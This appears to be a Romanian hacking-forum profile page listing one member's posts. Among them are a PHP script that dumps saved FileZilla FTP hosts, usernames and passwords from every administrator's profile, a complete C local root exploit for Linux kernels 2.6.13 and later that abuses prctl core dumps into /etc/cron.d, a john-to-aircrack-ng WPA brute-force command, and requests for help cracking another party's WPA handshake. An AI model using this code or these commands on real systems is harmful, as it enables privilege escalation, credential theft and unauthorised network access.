Jump to content

AlucardHao

Active Members
  • Posts

    130
  • Joined

  • Last visited

Everything posted by AlucardHao

  1. Salutare, Pentru cine e interesat in cazul in care foloseste pe windows filZilla si nu isi mai stie parolele de FTP etc. <?php $data = shell_exec("net users"); $data = explode("\n",$data); foreach($data as $key=>$value) { if(!strstr($value,"Administrator")) { unset($data[$key]); } } $data=array_values($data); $data = $data[0]; $data = explode(" ",$data); foreach($data as $key=>$value) { if(strlen($value)==0) { unset($data[$key]); } } $UserList = array_values($data); $Data=""; foreach($UserList as $key=>$value) { if(file_exists("C:\\Users\\".$value."\\AppData\\Roaming\\FileZilla\\recentservers.xml")) { $serv = 0; $xml_Data_recent_servers = simplexml_load_file("C:\\Users\\".$value."\\AppData\\Roaming\\FileZilla\\recentservers.xml"); $Data.="Recent FileZilla Servers:\n\nUsername: ".$value."\n\n"; $Data.= "\n====================================================================================================\n\n"; $recent_servers = $xml_Data_recent_servers->RecentServers; foreach($recent_servers->Server as $key=>$server) { ++$serv; $Data.="Nr:".$serv."\nHost: ".$server->Host."\nPort: ".$server->Port."\nUser: ".$server->User."\nPass : ".$server->Pass."\n"; $Data.="\n====================================================================================================\n\n"; } $xml_Data_recent_servers = simplexml_load_file("C:\\Users\\".$value."\\AppData\\Roaming\\FileZilla\\sitemanager.xml"); $Data.= "\n****************************************************************************************************\n\n"; $Data.="FileZilla SiteManager Servers:\n\nUsername: ".$value."\n\n"; $recent_servers = $xml_Data_recent_servers->Servers; $serv = 0; foreach($recent_servers->Server as $key=>$server) { ++$serv; $Data.="Nr:".$serv."\nHost: ".$server->Host."\nPort: ".$server->Port."\nUser: ".$server->User."\nPass : ".$server->Pass."\n"; $Data.="\n====================================================================================================\n\n"; } } } echo $Data; ?>
  2. btw.. sa imi trimiti si mie pls isourile ca am luat atunci doar ce era masina virtuala si imi cere obligatoriu iso cica
  3. sau o alta varianta ar fi folosind YUMI unde este optiunea pentru download a fisierelor iso care contin diferite distributii de linux
  4. de ai cum da... chiar ar fi ceva super fain.. eu unul chiar sunt interesat.
  5. sal.. am si eu un atmega16... si am facut un programator pe serial.. cand deschid ponyprog si dau setup->interface setup si caut pe toate com-urile si toate intrarile serial... si cand dau probe... imi da probe failed... din ce cauza credeti?
  6. eu nu am primit invitatia danandrei2005@gmail.com
  7. pentru un acer extensa 5510z ai?.. si as dori sa stiu si din ce cauza nu pot sa instalez driverele pentru cititorul de carduri?... specificatii laptop: intel pentium dual core 1.73 ghz 1 gb ram 120 hdd video integrat 256 mentionez ca am instalat pe el win xp sp3? merci mult de tot..
  8. daca nu ati sters linku cu 7 zile vip in care aveti contu... dati click iar pe el dupa ce expira.. si mai aveti 7 zile vip.. si tot asa sper ca va ajuta asta cu ceva..
  9. salut.. tocmai am terminat un list de 7 gb de parole.. si tot nu am reusit sa gasesc parola pentru un wpa.. si am pus si pe sistemu desktop o lista de 33 Gb.. se poate ca sa ma ajute si pe mine cineva? sau macar na.. sa imi zica alta optiune... am uploadat folderul cu handshakeu capturat pe Index of /edx daca nu se poate sa primesc ajutor in gasirea parole atunci poate un mic sfat cum sa fac altcumva merci mult de tot
  10. sal.. am si eu o intrebare.. de curiozitate cam cat dureaza in general sa faci un bruteforce la o cheie wpa dupa ce ai prins handshake-ul eu am lasat 20 si ceva de ore pe bruteforce.. si nu a dat nici un rezultate.. comanda de bruteforce: /pentest/passwords/jtr/john --stdout --incremental:all | aircrack-ng -b (aici am pus macul prins de la handshake) -w - fisier.cap ce sa ii fac?? ca la wep merge mai repede.. dar wpa.. nu stiu cum, dar din cate se pare dureaza mult prea mult.
  11. ti-am trimis si eu un pm .. si scz de deranj.. salutare la vechii si noii membri rst. am venit si eu inapoi in tara .. ce mai face lumea ..
  12. in lipsa de ocupatie am inceput sa ma uit pe google dupa smart tables si am dat peste un tutorial cum sa iti faci un Multitouch Pad folosind doar o camera web, cutie gea+hartie si 2-3 softuri cum ar fi mtmini sau tlib sau touchpad si tuiomouse... acesta e linkul catre forumul care arata cum sa iti faci Multitouch Pad-ul rprecum si softurile care iti trebuie. http://nuigroup.com/forums/viewthread/1731/ stiuk ii vechi dar cel putin ii interesant..
  13. google it!Mersi pentru raspuns. Cu JTR am incercat de cateva ori, de fiecare data imi zice "no hash passwords found". Cred ca nu creez bine fiserul in care trebuie sa existe stringul de decriptat. pt a sparge parolele e john the ripper nu jack..... pt devianc3 si brugner
  14. un tut despre steganography ar fi bun...
  15. cu imagediff.. il pun la sectiunea altele
  16. imaginile sunt diferite.... nasul gura ochii urechea gulerul... asta imaginea decoperita de mn...
  17. Ce oi fi stat atata... mie in 20 de minute l`am facut si pe CD ... CQKill v2.0 Conquiztador killer versiunea iunie 2008: rapidshare.com/files/119494186/CQKill_v2.0.exe.html am sa te rog sa nu mai faci asa ceva... totusi stim k slick nu lo fc public si k nu prea merge cu din astea... asa k sfatu meu e sa stai cuminte pan ce nu vede kenpachi asta... Antivirus Version Last Update Result AhnLab-V3 2008.5.30.1 2008.06.02 Win-Trojan/Beastdoor.34186 AntiVir 7.8.0.26 2008.06.02 BDS/Beastdoor.205.A Authentium 5.1.0.4 2008.06.01 W32/Beastdoor.AY@bd Avast 4.8.1195.0 2008.06.02 Win32:BeastDoor-AS AVG 7.5.0.516 2008.06.02 BackDoor.Generic6.CPN BitDefender 7.2 2008.06.02 Backdoor.Beastdoor.L CAT-QuickHeal 9.50 2008.05.31 Backdoor.Beastdoor.l ClamAV 0.92.1 2008.06.02 Trojan.Beastdoor-22 DrWeb 4.44.0.09170 2008.06.02 Adware.Zango eSafe 7.0.15.0 2008.06.01 suspicious Trojan/Worm eTrust-Vet 31.4.5837 2008.05.30 Win32/Ulysses.AE Ewido 4.0 2008.06.01 Backdoor.Beastdoor.l F-Prot 4.4.4.56 2008.06.01 W32/Beastdoor.AY@bd F-Secure 6.70.13260.0 2008.06.02 Backdoor.Win32.Beastdoor.l Fortinet 3.14.0.0 2008.06.02 W32/Beastdoor.L!dam GData 2.0.7306.1023 2008.06.02 Backdoor.Win32.Beastdoor.l Ikarus T3.1.1.26.0 2008.06.02 Trojan-Dropper.Win32.Agent.B Kaspersky 7.0.0.125 2008.06.02 Backdoor.Win32.Beastdoor.l McAfee 5307 2008.05.30 BackDoor-AMQ Microsoft 1.3520 2008.06.02 Backdoor:Win32/Beastdoor.L NOD32v2 3151 2008.06.02 Win32/Beastdoor.207 Norman 5.80.02 2008.05.30 W32/Beastdoor.2_07A Panda 9.0.0.4 2008.06.01 Bck/BeastDoor.BG Prevx1 V2 2008.06.02 Malicious Software Rising 20.47.01.00 2008.06.02 Backdoor.Win32.Beastdoor.a Sophos 4.29.0 2008.06.02 Troj/BeastDo-V Sunbelt 3.0.1139.1 2008.05.29 - Symantec 10 2008.06.02 Backdoor.Beasty TheHacker 6.2.92.331 2008.06.02 Backdoor/Beastdoor.l VBA32 3.12.6.6 2008.06.01 Backdoor.Beastdoor.206.d VirusBuster 4.3.26:9 2008.06.01 Backdoor.Beastdoor.FA Webwasher-Gateway 6.6.2 2008.06.02 Trojan.Backdoor.Beastdoor.205.A
  18. Result: 20 of 20 100% Perfect!!! Time Spent 5:32
  19. asta e scoru meu.. dar.... am o mica prb.. nu trece 32767 imi afiseaza asta:
  20. da ... killall -9 udp va avea efect...
  21. bazandu-ma pe exploitu de prctl() facut de Tienns pentru fedora core 1 eu si cu un coleg de clasa am realizat acest script in c... care ofera shell de root ... noi am testat pe redhat ubuntu fedora knoppix astrumi morphis stryunx ... toate acestea avand versiunea kernelulu >=2.6.13 /****************************************** * Linux >= 2.6.13 prctl() kernel exploit * * * * (C) AlucarHao * * * * * ******************************************/ #include <sys/types.h> #include <sys/time.h> #include <sys/resource.h> #include <sys/prctl.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #include <signal.h> #include <stdlib.h> #include <time.h> #define CROND "/etc/cron.d" #define BUFSIZE 1024 struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY}; char crontemplate[]= "#/etc/cron.d/core suid_dumpable exploit\n" "SHELL=/bin/sh\n" "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n" "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n"; char cronstring[BUFSIZE]; char fname[BUFSIZE]; struct timeval te; void sh(int sn) { execl(fname, fname, (char *) NULL); } int main(int argc, char *argv[]) { int nw, pid; if (geteuid() == 0) { printf("[+] obtinerea de rootshell\n"); setuid(0); setgid(0); if (execl("/bin/sh", "/bin/sh", (char *) NULL)) { perror("[-] execle"); return 1; } } printf("\\suidsafe exploit/\n\n(C) AlucardHao\n\n"); /* get our file name */ if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) { perror("[-] readlink"); printf("Asta nu e fatal, rescrie exploitul\n"); } if (signal(SIGUSR1, sh) == SIG_ERR) { perror("[-] signal"); return 1; } printf("[+] Instaleaza handler-ul de semnal\n"); /* Let us create core files */ setrlimit(RLIMIT_CORE, &myrlimit); if (chdir(CROND) == -1) { perror("[-] chdir"); return 1; } /* exploit the flaw */ if (prctl(PR_SET_DUMPABLE, 2) == -1) { perror("[-] prtctl"); printf("Versiunea de kernel e >= 2.6.13 ?\n"); return 1; } printf("[+] Sunt suidsafe!\n"); /* Forge the string for our core dump */ nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid()); if (nw >= sizeof(cronstring)) { printf("[-] cronstring is too small\n"); return 1; } printf("[+] String malitios implementat\n"); if ((pid=fork()) == -1) { perror("[-] fork"); return 1; } if (pid == 0) { /* This is not the good way to do it */ sleep(120); exit(0); } /* SEGFAULT the child */ printf("[+] Segmentation fault child\n"); if (kill(pid, 11) == -1) { perror("[-] kill"); return 1; } if (gettimeofday(&te, NULL) == 0) printf("[+] In asteptarea exploitului de a reusi (~%ld seconds)\n", 60 - (te.tv_sec%60)); sleep(120); printf("[-] Pare se ca exploitul a dat gres\n"); return 1; }
×
×
  • Create New...